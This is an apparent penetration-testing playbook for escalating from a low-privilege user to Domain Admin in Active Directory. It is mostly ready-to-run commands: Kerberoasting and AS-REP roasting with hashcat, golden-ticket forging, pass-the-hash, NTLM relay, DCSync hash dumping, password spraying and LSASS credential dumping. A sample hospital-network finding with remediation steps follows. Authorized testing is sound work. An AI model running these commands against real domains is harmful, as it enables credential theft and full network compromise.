Do not use without explicit written authorization from the domain owner, against production domain controllers during business hours unless approved, or for testing that could cause account lockouts affecting real users without prior coordination.
Enumerate the AD environment from a low-privilege domain user position:
Get-ADDomain or crackmapexec smb <dc_ip> -u <user> -p <pass> --domains to identify domain name, functional level, domain controllers, and forest trustsGet-ADUser -Filter * -Properties ServicePrincipalName,AdminCount,PasswordLastSet to identify service accounts, privileged accounts, and stale passwordsnet group "Domain Admins" /domain
Get-GPO -All | Get-GPOReport -ReportType XML to identify Group Policy configurations including password policies, audit settings, and software deploymentnltest /domain_trusts /all_trusts to map inter-domain and inter-forest trusts, noting trust direction and transitivityldapsearch or ADExplorer to search for accounts with userAccountControl flags indicating "password never expires", "password not required", or "DES-only Kerberos"Collect and analyze AD relationship data to identify the shortest paths to Domain Admin:
SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\temp\ to collect users, groups, sessions, ACLs, trusts, and GPO dataExecute Kerberos-based attacks against identified vulnerable accounts:
impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile kerberoast.hashes. Crack offline with hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
impacket-GetNPUsers <domain>/ -dc-ip <dc_ip> -usersfile users.txt -format hashcat -outputfile asrep.hashes. Crack with hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn <service/host> <username>
mimikatz "kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /krbtgt:<hash> /ticket:golden.kirbi"
Exploit harvested credentials to move through the domain:
impacket-psexec <domain>/<user>@<target> -hashes <LM:NTLM> to execute commands on systems where the compromised account has local adminexport KRB5CCNAME=ticket.ccache && impacket-psexec <domain>/<user>@<target> -k -no-pass to use captured or forged Kerberos ticketsimpacket-ntlmrelayx -t ldap://<dc_ip> --escalate-user <user> and coerce authentication to relay NTLM credentials for privilege escalationimpacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc-ntlm to dump all domain password hashescrackmapexec smb <dc_ip> -u users.txt -p 'Winter2025!' --no-bruteforce testing one password across all accounts to avoid lockoutsmimikatz "sekurlsa::logonpasswords" or procdump -ma lsass.exe lsass.dmp followed by offline extractionChain discovered attack paths to escalate from low-privilege user to Domain Admin:
crackmapexec smb <dc_ip> -u <user> -p <pass> -M gpp_autologon
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd
certipy find -vulnerable -u <user>@<domain> -p <pass> -dc-ip <dc_ip> to find exploitable certificate templates (ESC1-ESC8)| Term | Definition |
|---|---|
| Kerberoasting | Requesting Kerberos TGS tickets for accounts with Service Principal Names and cracking them offline to recover the service account's plaintext password |
| AS-REP Roasting | Requesting Kerberos AS-REP responses for accounts without pre-authentication enabled and cracking the encrypted timestamp offline |
| DCSync | Using Directory Replication Service privileges (DS-Replication-Get-Changes-All) to replicate password data from a domain controller, mimicking the behavior of a DC |
| BloodHound | Graph-based Active Directory analysis tool that maps privilege relationships and identifies attack paths from any user to high-value targets like Domain Admin |
| Unconstrained Delegation | A Kerberos delegation configuration where a service can impersonate any user to any other service, allowing TGT capture from connecting users |
| Pass-the-Hash | Authentication technique using an NTLM hash directly instead of the plaintext password, exploiting Windows NTLM authentication |
| AD CS Abuse | Exploiting misconfigured Active Directory Certificate Services templates to request certificates that grant elevated privileges or impersonate other users |
| NTLM Relay | Forwarding captured NTLM authentication to a different service to authenticate as the victim, effective when SMB signing is not enforced |
Context: A hospital network with a single Active Directory forest containing 5,000 user accounts, 800 computer objects, and 15 domain controllers across 3 sites. The tester starts with a single low-privilege domain user account. The goal is to determine if an attacker with stolen employee credentials could escalate to Domain Admin.
Approach:
Pitfalls:
## Finding: Service Account Vulnerable to Kerberoasting with Weak Password
**ID**: AD-002
**Severity**: Critical (CVSS 9.1)
**Affected Object**: SVC-SQL@corp.example.com (Service Account)
**Attack Technique**: MITRE ATT&CK T1558.003 - Kerberoasting
**Description**:
The service account SVC-SQL has a Service Principal Name (MSSQLSvc/db-server-01.corp.example.com:1433)
registered in Active Directory and uses a weak password that was cracked in 12 minutes
using hashcat with the rockyou.txt wordlist. This account has local administrator
privileges on DB-SERVER-01, which had an active Domain Admin session at the time of
testing.
**Attack Chain**:
1. Requested TGS ticket: impacket-GetUserSPNs corp.example.com/testuser:password -request
2. Cracked hash: hashcat -m 13100 hash.txt rockyou.txt (cracked in 12m: Summer2023!)
3. Lateral movement: impacket-psexec corp.example.com/SVC-SQL:Summer2023!@db-server-01
4. Credential extraction: mimikatz sekurlsa::logonpasswords -> Domain Admin NTLM hash
**Impact**:
Complete domain compromise from a single low-privilege domain user account. An attacker
could access all 5,000 user accounts, 800 computer objects, and all data within the domain.
**Remediation**:
1. Set a 25+ character randomly generated password for SVC-SQL and all service accounts
2. Migrate to Group Managed Service Accounts (gMSA) which rotate 120-character passwords automatically
3. Enable AES256 encryption for Kerberos and disable RC4 (DES) encryption
4. Remove SVC-SQL from local administrator groups on DB-SERVER-01
5. Implement Protected Users group for privileged accounts to prevent credential caching
6. Deploy Microsoft Defender for Identity to detect Kerberoasting and DCSync attacks